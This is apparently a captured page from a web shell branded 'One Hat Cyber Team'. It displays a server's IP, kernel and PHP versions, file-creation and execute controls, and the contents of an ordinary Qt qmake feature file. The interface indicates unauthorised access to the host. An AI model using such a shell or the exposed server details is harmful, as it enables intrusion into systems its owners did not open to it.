⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.78
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
x86_64-linux-gnu
/
qt5
/
mkspecs
/
features
/
View File Name :
qt_prefix_build_check.prf
# # W A R N I N G # ------------- # # This file is not part of the Qt API. It exists purely as an # implementation detail. It may change from version to version # without notice, or even be removed. # # We mean it. # defineTest(qtIsPrefixBuild) { prefixdir = $$1 # qtbase non-prefix build? exists($$prefixdir/.qmake.cache): \ return(false) # top-level non-prefix build? contains(prefixdir, .*/qtbase):exists($$dirname(prefixdir)/.qmake.super): \ return(false) return(true) }